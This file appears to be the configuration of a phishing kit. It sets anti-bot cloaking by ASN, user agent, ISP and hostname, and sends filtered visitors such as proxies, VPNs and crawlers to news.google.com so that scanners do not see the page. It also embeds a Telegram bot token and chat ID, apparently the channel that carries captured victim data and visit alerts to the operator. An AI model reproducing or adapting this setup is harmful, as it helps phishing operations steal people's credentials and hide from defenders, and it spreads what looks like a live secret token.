setting_asn='on'
setting_ua='on'
setting_isp='on'
setting_host='on'
setting_crawlerdetect='off'
setting_country='off'

Token='5118041959:AAFGLLZ2_UulTZ3EwX_nQ9yjfgJfNXAPbcw'
ChatID='-599009954'
viewsToken='5118041959:AAFGLLZ2_UulTZ3EwX_nQ9yjfgJfNXAPbcw'
viewsChatID='-599009954'

Exit_asn='https://news.google.com/'
Exit_ua='https://news.google.com/'
Exit_isp='https://news.google.com/'
Exit_host='https://news.google.com/'
Exit_crawlerdetect='https://news.google.com/'
Exit_proxy='https://news.google.com/'
Exit_vpn='https://news.google.com/'
Exit_country='https://news.google.com/'